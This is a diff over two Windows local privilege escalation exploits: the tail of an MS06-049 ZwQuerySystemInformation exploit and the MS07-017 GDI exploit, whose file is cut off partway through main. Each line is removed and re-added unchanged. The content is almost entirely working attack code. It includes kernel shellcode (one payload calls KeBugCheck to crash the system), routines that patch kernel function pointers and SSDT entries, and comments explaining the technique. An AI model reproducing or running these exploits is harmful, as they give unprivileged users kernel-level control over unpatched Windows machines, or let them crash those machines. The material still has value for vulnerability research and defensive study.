-    PUSHORT        pOrdinals;
+    PUSHORT        pOrdinals;
-    PIMAGE_NT_HEADERS    pHeader;
+    PIMAGE_NT_HEADERS    pHeader;
-    PIMAGE_EXPORT_DIRECTORY    pExport;
+    PIMAGE_EXPORT_DIRECTORY    pExport;
-    PIMAGE_SECTION_HEADER pSectionHeader;
+    PIMAGE_SECTION_HEADER pSectionHeader;
-    PROCESS_BASIC_INFORMATION pbi;
+    PROCESS_BASIC_INFORMATION pbi;
-    SYSTEM_MODULE_INFORMATION    smi;
+    SYSTEM_MODULE_INFORMATION    smi;
-    char        DriverName[256];
+    char        DriverName[256];
-    ULONG        Byte, FileSize, len, i, j, k, Count, BaseAddress, Value, KernelBase, buf[64], HookAddress, Temp, Sections;
+    ULONG        Byte, FileSize, len, i, j, k, Count, BaseAddress, Value, KernelBase, buf[64], HookAddress, Temp, Sections;
-    USHORT    index;
+    USHORT    index;
-    HANDLE    hDevice, hFile, hFileMap;
+    HANDLE    hDevice, hFile, hFileMap;
-
+
-    printf("\n MS06-049 Windows ZwQuerySystemInformation Local Privilege Escalation Vulnerability Exploit \n\n");
+    printf("\n MS06-049 Windows ZwQuerySystemInformation Local Privilege Escalation Vulnerability Exploit \n\n");
-    printf("\t Create by SoBeIt. \n\n");
+    printf("\t Create by SoBeIt. \n\n");
-    if(argc != 1)
+    if(argc != 1)
-    {
+    {
-        printf(" Usage:%s \n\n", argv[0]);
+        printf(" Usage:%s \n\n", argv[0]);
-        return 1;
+        return 1;
-    }
+    }
-
+
-    GetFunction();
+    GetFunction();
-
+
-    if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
+    if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
-        ErrorQuit("ZwQueryInformationProcess failed\n");
+        ErrorQuit("ZwQueryInformationProcess failed\n");
-    
+    
-    KernelBase = GetKernelBase();
+    KernelBase = GetKernelBase();
-    if(!KernelBase)
+    if(!KernelBase)
-        ErrorQuit("Unable to get kernel base address.\n");
+        ErrorQuit("Unable to get kernel base address.\n");
-        
+        
-    printf("Kernel base address: %x\n", KernelBase);
+    printf("Kernel base address: %x\n", KernelBase);
-
+
-    pRestoreBuffer = malloc(0x100);
+    pRestoreBuffer = malloc(0x100);
-    if(pRestoreBuffer == NULL)
+    if(pRestoreBuffer == NULL)
-        ErrorQuit("malloc failed.\n");
+        ErrorQuit("malloc failed.\n");
-    
+    
-    pStoreBuffer = VirtualAlloc(NULL, 0x1001000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+    pStoreBuffer = VirtualAlloc(NULL, 0x1001000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
-    if(pStoreBuffer == NULL)
+    if(pStoreBuffer == NULL)
-        ErrorQuit("VirtualAlloc failed.\n");
+        ErrorQuit("VirtualAlloc failed.\n");
-        
+        
-    printf("Allocated address:%x\n", pStoreBuffer);
+    printf("Allocated address:%x\n", pStoreBuffer);
-    
+    
-    if(!GetSystemDirectory((PUCHAR)pStoreBuffer, 256))
+    if(!GetSystemDirectory((PUCHAR)pStoreBuffer, 256))
-        ErrorQuit("GetSystemDirectory failed.\n");
+        ErrorQuit("GetSystemDirectory failed.\n");
-
+
-    strcat((PUCHAR)pStoreBuffer, "\\ntoskrnl.exe");
+    strcat((PUCHAR)pStoreBuffer, "\\ntoskrnl.exe");
-    hFile = CreateFile((PUCHAR)pStoreBuffer, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    hFile = CreateFile((PUCHAR)pStoreBuffer, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-    if(hFile == INVALID_HANDLE_VALUE)
+    if(hFile == INVALID_HANDLE_VALUE)
-    {
+    {
-        hFile = CreateFile("ntoskrnl.exe", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+        hFile = CreateFile("ntoskrnl.exe", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-        if(hFile == INVALID_HANDLE_VALUE)
+        if(hFile == INVALID_HANDLE_VALUE)
-            ErrorQuit("CreateFile failed.\n");
+            ErrorQuit("CreateFile failed.\n");
-    }
+    }
-
+
-    if((FileSize = GetFileSize(hFile, NULL)) == 0xffffffff)
+    if((FileSize = GetFileSize(hFile, NULL)) == 0xffffffff)
-        ErrorQuit("GetFileSize failed.\n");
+        ErrorQuit("GetFileSize failed.\n");
-
+
-    printf("File size:%x\n", FileSize);
+    printf("File size:%x\n", FileSize);
-    pBase = (PUCHAR)VirtualAlloc(NULL, FileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+    pBase = (PUCHAR)VirtualAlloc(NULL, FileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
-    if(pBase == NULL)
+    if(pBase == NULL)
-        ErrorQuit("VirtualAlloc failed.\n");
+        ErrorQuit("VirtualAlloc failed.\n");
-        
+        
-    if(!ReadFile(hFile, pBase, FileSize, &Byte, NULL))
+    if(!ReadFile(hFile, pBase, FileSize, &Byte, NULL))
-        ErrorQuit("ReadFile failed.\n");
+        ErrorQuit("ReadFile failed.\n");
-
+
-    pHeader = (PIMAGE_NT_HEADERS)(pBase + ((PIMAGE_DOS_HEADER)pBase)->e_lfanew);
+    pHeader = (PIMAGE_NT_HEADERS)(pBase + ((PIMAGE_DOS_HEADER)pBase)->e_lfanew);
-    pSectionHeader = (PIMAGE_SECTION_HEADER)((PUCHAR)(&pHeader->OptionalHeader) + pHeader->FileHeader.SizeOfOptionalHeader);
+    pSectionHeader = (PIMAGE_SECTION_HEADER)((PUCHAR)(&pHeader->OptionalHeader) + pHeader->FileHeader.SizeOfOptionalHeader);
-    Sections= pHeader->FileHeader.NumberOfSections;
+    Sections= pHeader->FileHeader.NumberOfSections;
-
+
-    pExport = (PIMAGE_EXPORT_DIRECTORY)(pBase + 
+    pExport = (PIMAGE_EXPORT_DIRECTORY)(pBase + 
-        RVA2Offset(pHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress,
+        RVA2Offset(pHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress,
-        pSectionHeader,
+        pSectionHeader,
-        Sections
+        Sections
-        ));
+        ));
-
+
-    pNamesArray = (PULONG)(pBase + 
+    pNamesArray = (PULONG)(pBase + 
-                    RVA2Offset(pExport->AddressOfNames,
+                    RVA2Offset(pExport->AddressOfNames,
-                        pSectionHeader,
+                        pSectionHeader,
-                        Sections));
+                        Sections));
-                        
+                        
-    pFunctionsArray = (PULONG)(pBase +                        
+    pFunctionsArray = (PULONG)(pBase +                        
-                    RVA2Offset(pExport->AddressOfFunctions,
+                    RVA2Offset(pExport->AddressOfFunctions,
-                        pSectionHeader,
+                        pSectionHeader,
-                        Sections));
+                        Sections));
-                        
+                        
-    pOrdinals = (PUSHORT)(pBase + 
+    pOrdinals = (PUSHORT)(pBase + 
-                    RVA2Offset(pExport->AddressOfNameOrdinals,
+                    RVA2Offset(pExport->AddressOfNameOrdinals,
-                        pSectionHeader,
+                        pSectionHeader,
-                        Sections));
+                        Sections));
-                        
+                        
-    len = strlen("NtVdmControl");
+    len = strlen("NtVdmControl");
-    for(i = 0; i < pExport->NumberOfNames; i++)
+    for(i = 0; i < pExport->NumberOfNames; i++)
-    {
+    {
-        pName = pBase + RVA2Offset(pNamesArray[i], pSectionHeader, Sections);
+        pName = pBase + RVA2Offset(pNamesArray[i], pSectionHeader, Sections);
-        if(!strncmp(pName, "NtVdmControl", len))
+        if(!strncmp(pName, "NtVdmControl", len))
-            break;
+            break;
-    }
+    }
-
+
-    if(i > pExport->NumberOfFunctions)
+    if(i > pExport->NumberOfFunctions)
-        ErrorQuit("Some error occured.\n");
+        ErrorQuit("Some error occured.\n");
-
+
-    index = pOrdinals[i]; 
+    index = pOrdinals[i]; 
-    HookAddress = pFunctionsArray[index] + KernelBase;
+    HookAddress = pFunctionsArray[index] + KernelBase;
-    memcpy((PUCHAR)pRestoreBuffer, pBase + pFunctionsArray[index] - 1, 0x10);
+    memcpy((PUCHAR)pRestoreBuffer, pBase + pFunctionsArray[index] - 1, 0x10);
-    printf("%s Address:%x\n", "NtVdmControl", HookAddress);
+    printf("%s Address:%x\n", "NtVdmControl", HookAddress);
-    
+    
-    pShellcode = (PULONG)shellcode;
+    pShellcode = (PULONG)shellcode;
-    for(k = 0; pShellcode[k++] != 0x90cccc90; )
+    for(k = 0; pShellcode[k++] != 0x90cccc90; )
-                ;
+                ;
-
+
-    for(j = 0; kfunctions[j][0] != '\x0'; j++)
+    for(j = 0; kfunctions[j][0] != '\x0'; j++)
-        buf[j] = ComputeHash(kfunctions[j]);
+        buf[j] = ComputeHash(kfunctions[j]);
-
+
-    buf[j++] = pbi.InheritedFromUniqueProcessId;
+    buf[j++] = pbi.InheritedFromUniqueProcessId;
-    buf[j++] = (ULONG)pRestoreBuffer;
+    buf[j++] = (ULONG)pRestoreBuffer;
-    buf[j++] = HookAddress - 1;
+    buf[j++] = HookAddress - 1;
-    buf[j++] = 0x10;    
+    buf[j++] = 0x10;    
-
+
-    memcpy((char *)(pShellcode + k), (char *)buf, j * 4);
+    memcpy((char *)(pShellcode + k), (char *)buf, j * 4);
-    
+    
-    Temp = 0;
+    Temp = 0;
-    for(i = 0; i < 7; i++)
+    for(i = 0; i < 7; i++)
-    {
+    {
-        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
+        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
-        Byte = Byte / sizeof(SYSTEM_MODULE_INFORMATION);
+        Byte = Byte / sizeof(SYSTEM_MODULE_INFORMATION);
-        Temp += Byte;
+        Temp += Byte;
-    }
+    }
-    
+    
-    Byte = Temp / 7;
+    Byte = Temp / 7;
-    printf("Single value:%x\n", Byte);
+    printf("Single value:%x\n", Byte);
-    Value = (0xe9 << 8) & 0xff00;
+    Value = (0xe9 << 8) & 0xff00;
-    printf("Jump value:%x\n", Value);
+    printf("Jump value:%x\n", Value);
-    printf("Base value:%x\n", pRestoreBuffer[0]);
+    printf("Base value:%x\n", pRestoreBuffer[0]);
-    for(Count = 0; ; Count++)
+    for(Count = 0; ; Count++)
-    {
+    {
-        if(((pRestoreBuffer[0] + Count * Byte) & 0xff00) == Value)
+        if(((pRestoreBuffer[0] + Count * Byte) & 0xff00) == Value)
-            break;    
+            break;    
-    }
+    }
-    
+    
-    printf("Need value generated:%x\n", pRestoreBuffer[0] + Count * Byte);
+    printf("Need value generated:%x\n", pRestoreBuffer[0] + Count * Byte);
-    printf("Count value:%x\n", Count);
+    printf("Count value:%x\n", Count);
-    for(i = 0; i < Count; i ++)
+    for(i = 0; i < Count; i ++)
-        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)(HookAddress - 1), 0, &Byte);
+        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)(HookAddress - 1), 0, &Byte);
-
+
-    Temp = 0;
+    Temp = 0;
-    for(i = 0; i < 7; i++)
+    for(i = 0; i < 7; i++)
-    {
+    {
-        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
+        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
-        Byte = Byte / sizeof(SYSTEM_MODULE_INFORMATION);
+        Byte = Byte / sizeof(SYSTEM_MODULE_INFORMATION);
-        Temp += Byte;
+        Temp += Byte;
-    }
+    }
-    
+    
-    Byte = Temp / 7;
+    Byte = Temp / 7;
-    printf("Single value:%x\n", Byte);
+    printf("Single value:%x\n", Byte);
-    Value = (((ULONG)pStoreBuffer + 0x800000 - HookAddress) >> 16) & 0xfff0;
+    Value = (((ULONG)pStoreBuffer + 0x800000 - HookAddress) >> 16) & 0xfff0;
-    printf("Jump value:%x\n", Value);
+    printf("Jump value:%x\n", Value);
-    printf("Base value:%x\n", pRestoreBuffer[1]);
+    printf("Base value:%x\n", pRestoreBuffer[1]);
-    for(Count = 0; ; Count++)
+    for(Count = 0; ; Count++)
-    {
+    {
-        if(((pRestoreBuffer[1] + Count * Byte) & 0xfff0) == Value)
+        if(((pRestoreBuffer[1] + Count * Byte) & 0xfff0) == Value)
-            break;
+            break;
-    }
+    }
-
+
-    printf("Need value generated:%x\n", pRestoreBuffer[1] + Count * Byte);
+    printf("Need value generated:%x\n", pRestoreBuffer[1] + Count * Byte);
-    printf("Count value:%x\n", Count);
+    printf("Count value:%x\n", Count);
-    for(i = 0; i < Count; i ++)
+    for(i = 0; i < Count; i ++)
-        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)(HookAddress + 3), 0, &Byte);
+        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)(HookAddress + 3), 0, &Byte);
-
+
-    memset(pStoreBuffer, 0x90, 0x1001000);
+    memset(pStoreBuffer, 0x90, 0x1001000);
-    memcpy((PUCHAR)pStoreBuffer + 0x1000000, shellcode, sizeof(shellcode));
+    memcpy((PUCHAR)pStoreBuffer + 0x1000000, shellcode, sizeof(shellcode));
-        
+        
-    CloseHandle(hFile);
+    CloseHandle(hFile);
-
+
-    printf("Exploitation finished.\n");
+    printf("Exploitation finished.\n");
-    ZwVdmControl(0, NULL);
+    ZwVdmControl(0, NULL);
-    
+    
-    return 1;
+    return 1;
-}
+}
-
+
-// milw0rm.com [2006-09-21]
+// milw0rm.com [2006-09-21]
--- a/platforms/windows/local/3688.c
+++ b/platforms/windows/local/3688.c
@ -1,340 +1,340 @@
-#define _WIN32_WINNT 0x0500
+#define _WIN32_WINNT 0x0500
-#include <windows.h>
+#include <windows.h>
-#include <shlwapi.h>
+#include <shlwapi.h>
-#include <stdio.h>
+#include <stdio.h>
-
+
-#pragma comment (lib, "user32.lib")
+#pragma comment (lib, "user32.lib")
-#pragma comment (lib, "gdi32.lib")
+#pragma comment (lib, "gdi32.lib")
-#pragma comment (lib, "shlwapi.lib")
+#pragma comment (lib, "shlwapi.lib")
-#pragma comment (lib, "ntdll.lib")
+#pragma comment (lib, "ntdll.lib")
-
+
-
+
-
+
-/*
+/*
-Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences
+Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences
-by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's changean entry of the 
+by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's changean entry of the 
-win32k's SSDT by 0x2. 
+win32k's SSDT by 0x2. 
-
+
-before :
+before :
-lkd> dps bf998300 L 2
+lkd> dps bf998300 L 2
-bf998300  bf934921 win32k!NtGdiAbortDoc
+bf998300  bf934921 win32k!NtGdiAbortDoc
-bf998304  bf94648d win32k!NtGdiAbortPath
+bf998304  bf94648d win32k!NtGdiAbortPath
-
+
-after :
+after :
-lkd> dps bf998300 L 2
+lkd> dps bf998300 L 2
-bf998300  00000002
+bf998300  00000002
-bf998304  bf94648d win32k!NtGdiAbortPath
+bf998304  bf94648d win32k!NtGdiAbortPath
-
+
-win32k.sys bDeleteBrush (called by DeleteObject)
+win32k.sys bDeleteBrush (called by DeleteObject)
-mov     esi, [edx] ;esi=pKernelInfo
+mov     esi, [edx] ;esi=pKernelInfo
-cmp     [esi+4], ebx ; ebx=0, we need [esi+4]>0
+cmp     [esi+4], ebx ; ebx=0, we need [esi+4]>0
-mov     eax, [edx+0Ch]
+mov     eax, [edx+0Ch]
-mov     [ebp+var_8], eax
+mov     [ebp+var_8], eax
-ja      short loc_BF80C1E7 ;jump if [esi+4] > 0
+ja      short loc_BF80C1E7 ;jump if [esi+4] > 0
-
+
-loc_BF80C1E7:
+loc_BF80C1E7:
-mov     eax, [esi+24h]  ; [esi+24] = addr to hijack (here win32k SSDT)
+mov     eax, [esi+24h]  ; [esi+24] = addr to hijack (here win32k SSDT)
-mov     dword ptr [eax], 2 ; !!!!!
+mov     dword ptr [eax], 2 ; !!!!!
-
+
-At 0x2 we allocate memory with NtAllocateVirtualMemory and we copy our payload.
+At 0x2 we allocate memory with NtAllocateVirtualMemory and we copy our payload.
-
+
-Tested on windows xp sp2 french last updates (before MS07-017) 
+Tested on windows xp sp2 french last updates (before MS07-017) 
-
+
-Coded by Ivanlef0u. 
+Coded by Ivanlef0u. 
-http://ivanlef0u.free.fr
+http://ivanlef0u.free.fr
-
+
-ref:
+ref:
-http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
+http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
-http://research.eeye.com/html/alerts/zeroday/20061106.html
+http://research.eeye.com/html/alerts/zeroday/20061106.html
-http://projects.info-pull.com/mokb/MOKB-06-11-2006.html
+http://projects.info-pull.com/mokb/MOKB-06-11-2006.html
-https://www.blackhat.com/presentations/bh-eu-07/Eriksson-Janmar/Whitepaper/bh-eu-07-eriksson-WP.pdf
+https://www.blackhat.com/presentations/bh-eu-07/Eriksson-Janmar/Whitepaper/bh-eu-07-eriksson-WP.pdf
-http://www.securityfocus.com/bid/20940/info
+http://www.securityfocus.com/bid/20940/info
-*/
+*/
-
+
-typedef struct
+typedef struct
-{
+{
-   DWORD pKernelInfo;
+   DWORD pKernelInfo;
-   WORD  ProcessID; 
+   WORD  ProcessID; 
-   WORD  _nCount;
+   WORD  _nCount;
-   WORD  nUpper;
+   WORD  nUpper;
-   WORD  nType;
+   WORD  nType;
-   DWORD pUserInfo;
+   DWORD pUserInfo;
-} GDITableEntry;
+} GDITableEntry;
-
+
-typedef enum _SECTION_INFORMATION_CLASS {
+typedef enum _SECTION_INFORMATION_CLASS {
-SectionBasicInformation,
+SectionBasicInformation,
-SectionImageInformation
+SectionImageInformation
-}SECTION_INFORMATION_CLASS; 
+}SECTION_INFORMATION_CLASS; 
-
+
-typedef struct _SECTION_BASIC_INFORMATION { // Information Class 0
+typedef struct _SECTION_BASIC_INFORMATION { // Information Class 0
-PVOID BaseAddress;
+PVOID BaseAddress;
-ULONG Attributes;
+ULONG Attributes;
-LARGE_INTEGER Size;
+LARGE_INTEGER Size;
-}SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;
+}SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;
-
+
-extern "C" ULONG __stdcall NtQuerySection(
+extern "C" ULONG __stdcall NtQuerySection(
-	IN HANDLE SectionHandle,
+	IN HANDLE SectionHandle,
-	IN SECTION_INFORMATION_CLASS SectionInformationClass,
+	IN SECTION_INFORMATION_CLASS SectionInformationClass,
-	OUT PVOID SectionInformation,
+	OUT PVOID SectionInformation,
-	IN ULONG SectionInformationLength,
+	IN ULONG SectionInformationLength,
-	OUT PULONG ResultLength OPTIONAL
+	OUT PULONG ResultLength OPTIONAL
-);
+);
-
+
-extern "C" ULONG __stdcall NtAllocateVirtualMemory(
+extern "C" ULONG __stdcall NtAllocateVirtualMemory(
-	IN HANDLE ProcessHandle,
+	IN HANDLE ProcessHandle,
-	IN OUT PVOID *BaseAddress,
+	IN OUT PVOID *BaseAddress,
-	IN ULONG ZeroBits,
+	IN ULONG ZeroBits,
-	IN OUT PULONG AllocationSize,
+	IN OUT PULONG AllocationSize,
-	IN ULONG AllocationType,
+	IN ULONG AllocationType,
-	IN ULONG Protect
+	IN ULONG Protect
-);
+);
-
+
-typedef LONG NTSTATUS;
+typedef LONG NTSTATUS;
-
+
-#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L) 
+#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L) 
-#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) 
+#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) 
-
+
-typedef struct _UNICODE_STRING {
+typedef struct _UNICODE_STRING {
-USHORT Length;
+USHORT Length;
-USHORT MaximumLength;
+USHORT MaximumLength;
-PWSTR Buffer;
+PWSTR Buffer;
-} UNICODE_STRING, *PUNICODE_STRING;
+} UNICODE_STRING, *PUNICODE_STRING;
-
+
-typedef enum _SYSTEM_INFORMATION_CLASS {
+typedef enum _SYSTEM_INFORMATION_CLASS {
-SystemModuleInformation=11,
+SystemModuleInformation=11,
-} SYSTEM_INFORMATION_CLASS;
+} SYSTEM_INFORMATION_CLASS;
-
+
-typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11
+typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11
-ULONG Reserved[2];
+ULONG Reserved[2];
-PVOID Base;
+PVOID Base;
-ULONG Size;
+ULONG Size;
-ULONG Flags;
+ULONG Flags;
-USHORT Index;
+USHORT Index;
-USHORT Unknown;
+USHORT Unknown;
-USHORT LoadCount;
+USHORT LoadCount;
-USHORT ModuleNameOffset;
+USHORT ModuleNameOffset;
-CHAR ImageName[256];
+CHAR ImageName[256];
-} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 
-
+
-extern "C" NTSTATUS __stdcall  NtQuerySystemInformation(          
+extern "C" NTSTATUS __stdcall  NtQuerySystemInformation(          
-	IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
+	IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
-	IN OUT PVOID SystemInformation,
+	IN OUT PVOID SystemInformation,
-	IN ULONG SystemInformationLength,
+	IN ULONG SystemInformationLength,
-	OUT PULONG ReturnLength OPTIONAL
+	OUT PULONG ReturnLength OPTIONAL
-);
+);
-
+
-extern "C" ULONG __stdcall RtlNtStatusToDosError(
+extern "C" ULONG __stdcall RtlNtStatusToDosError(
-  NTSTATUS Status
+  NTSTATUS Status
-);
+);
-
+
-
+
-// generic kernel payload, reboot the b0x
+// generic kernel payload, reboot the b0x
-unsigned char Shellcode[]={ 
+unsigned char Shellcode[]={ 
-0x60, //PUSHAD
+0x60, //PUSHAD
-0x55, //PUSH EBP
+0x55, //PUSH EBP
-
+
-0x6A, 0x34,
+0x6A, 0x34,
-0x5B,
+0x5B,
-0x64, 0x8B, 0x1B,
+0x64, 0x8B, 0x1B,
-0x8B, 0x6B, 0x10,
+0x8B, 0x6B, 0x10,
-
+
-0x8B, 0x45, 0x3C,
+0x8B, 0x45, 0x3C,
-0x8B, 0x54, 0x05, 0x78,
+0x8B, 0x54, 0x05, 0x78,
-0x03, 0xD5,
+0x03, 0xD5,
-0x8B, 0x5A, 0x20,
+0x8B, 0x5A, 0x20,
-0x03, 0xDD,
+0x03, 0xDD,
-0x8B, 0x4A, 0x18,
+0x8B, 0x4A, 0x18,
-0x49,
+0x49,
-0x8B, 0x34, 0x8B,
+0x8B, 0x34, 0x8B,
-0x03, 0xF5,
+0x03, 0xF5,
-0x33, 0xFF,
+0x33, 0xFF,
-0x33, 0xC0,
+0x33, 0xC0,
-0xFC,
+0xFC,
-0xAC,
+0xAC,
-0x84, 0xC0,
+0x84, 0xC0,
-0x74, 0x07,
+0x74, 0x07,
-0xC1, 0xCF, 0x0D,
+0xC1, 0xCF, 0x0D,
-0x03, 0xF8,
+0x03, 0xF8,
-0xEB, 0xF4,
+0xEB, 0xF4,
-0x81, 0xFF, 0x1f, 0xaa ,0xf2 ,0xb9, //0xb9f2aa1f, KEBugCheck
+0x81, 0xFF, 0x1f, 0xaa ,0xf2 ,0xb9, //0xb9f2aa1f, KEBugCheck
-0x75, 0xE1,
+0x75, 0xE1,
-0x8B, 0x42, 0x24,
+0x8B, 0x42, 0x24,
-0x03, 0xC5,
+0x03, 0xC5,
-0x66, 0x8B, 0x0C, 0x48,
+0x66, 0x8B, 0x0C, 0x48,
-0x8B, 0x42, 0x1C,
+0x8B, 0x42, 0x1C,
-0x03, 0xC5,
+0x03, 0xC5,
-0x8B, 0x04 ,0x88,
+0x8B, 0x04 ,0x88,
-0x03, 0xC5,
+0x03, 0xC5,
-
+
-0x33, 0xDB,
+0x33, 0xDB,
-0xB3, 0xE5,
+0xB3, 0xE5,
-0x53,
+0x53,
-0xFF, 0xD0,
+0xFF, 0xD0,
-
+
-0x5D, //POP EBP
+0x5D, //POP EBP
-0x61, //POPAD
+0x61, //POPAD
-0xC3 //RET
+0xC3 //RET
-};	
+};	
-
+
-
+
-ULONG GetWin32kBase()
+ULONG GetWin32kBase()
-{
+{
-	ULONG i, Count, Status, BytesRet;
+	ULONG i, Count, Status, BytesRet;
-	PSYSTEM_MODULE_INFORMATION pSMI;
+	PSYSTEM_MODULE_INFORMATION pSMI;
-	
+	
-	Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, 0, &BytesRet); //allocation length
+	Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, 0, &BytesRet); //allocation length
-	if(Status!=STATUS_INFO_LENGTH_MISMATCH)
+	if(Status!=STATUS_INFO_LENGTH_MISMATCH)
-		printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status));
+		printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status));
-	
+	
-	pSMI=(PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, BytesRet);
+	pSMI=(PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, BytesRet);
-	
+	
-	Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, BytesRet, &BytesRet);
+	Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, BytesRet, &BytesRet);
-	
+	
-	if(Status!=STATUS_SUCCESS)
+	if(Status!=STATUS_SUCCESS)
-		printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status));
+		printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status));
-	
+	
-	/*
+	/*
-	The data returned to the SystemInformation buffer is a ULONG count of the number of
+	The data returned to the SystemInformation buffer is a ULONG count of the number of
-	handles followed immediately by an array of 
+	handles followed immediately by an array of 
-	SYSTEM_MODULE_INFORMATION.
+	SYSTEM_MODULE_INFORMATION.
-	*/
+	*/
-	
+	
-	Count=*(PULONG)pSMI;
+	Count=*(PULONG)pSMI;
-	pSMI=(PSYSTEM_MODULE_INFORMATION)((PUCHAR)pSMI+4);
+	pSMI=(PSYSTEM_MODULE_INFORMATION)((PUCHAR)pSMI+4);
-	
+	
-	for(i=0; i<Count; i++)
+	for(i=0; i<Count; i++)
-	{	
+	{	
-		if(StrStr((pSMI+i)->ImageName, "win32k.sys"))
+		if(StrStr((pSMI+i)->ImageName, "win32k.sys"))
-			return (ULONG)(pSMI+i)->Base;
+			return (ULONG)(pSMI+i)->Base;
-	}
+	}
-	
+	
-	HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE, pSMI);
+	HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE, pSMI);
-	
+	
-	return 0;	
+	return 0;	
-}	
+}	
-
+
-
+
-
+
-	
+	
-ULONG buff[500]={0};
+ULONG buff[500]={0};
-	
+	
-int main(int argc, char* argv[])
+int main(int argc, char* argv[])
-{
+{
-	ULONG i, PID, Status, Old;
+	ULONG i, PID, Status, Old;
-	LPVOID lpMapAddress=NULL;
+	LPVOID lpMapAddress=NULL;
-	HANDLE hMapFile=(HANDLE)0x10;
+	HANDLE hMapFile=(HANDLE)0x10;
-	GDITableEntry *gdiTable; 
+	GDITableEntry *gdiTable; 
-	SECTION_BASIC_INFORMATION SBI;
+	SECTION_BASIC_INFORMATION SBI;
-	WORD Upr;
+	WORD Upr;
-	ULONG Size=0x1000;
+	ULONG Size=0x1000;
-	PVOID Addr=(PVOID)0x2;
+	PVOID Addr=(PVOID)0x2;
-	
+	
-	printf("Windows GDI MS07-017 Local Privilege Escalation Exploit\nBy Ivanlef0u\n"
+	printf("Windows GDI MS07-017 Local Privilege Escalation Exploit\nBy Ivanlef0u\n"
-	"http://ivanlef0u.free.fr\n"
+	"http://ivanlef0u.free.fr\n"
-	"Be MAD!\n");
+	"Be MAD!\n");
-	
+	
-	//allocate memory at addresse 0x2
+	//allocate memory at addresse 0x2
- 	Status=NtAllocateVirtualMemory((HANDLE)-1, &Addr, 0, &Size, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); 
+ 	Status=NtAllocateVirtualMemory((HANDLE)-1, &Addr, 0, &Size, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); 
- 	if(Status)
+ 	if(Status)
- 		printf("Error with NtAllocateVirtualMemory : 0x%x\n", Status);
+ 		printf("Error with NtAllocateVirtualMemory : 0x%x\n", Status);
- 	else
+ 	else
- 		printf("Addr : 0x%x OKAY\n", Addr);	
+ 		printf("Addr : 0x%x OKAY\n", Addr);	
-	
+	
-	memcpy(Addr, Shellcode, sizeof(Shellcode)); 
+	memcpy(Addr, Shellcode, sizeof(Shellcode)); 
-	
+	
-
+
-
+
- 	printf("win32.sys base : 0x%x\n", GetWin32kBase());
+ 	printf("win32.sys base : 0x%x\n", GetWin32kBase());
-	
+	
-	ULONG Win32kSST=GetWin32kBase()+0x198300; //range between win32k imagebase and it's SSDT
+	ULONG Win32kSST=GetWin32kBase()+0x198300; //range between win32k imagebase and it's SSDT
-	printf("SSDT entry : 0x%x\n", Win32kSST); //win32k!NtGdiAbortDoc
+	printf("SSDT entry : 0x%x\n", Win32kSST); //win32k!NtGdiAbortDoc
-	
+	
-	
+	
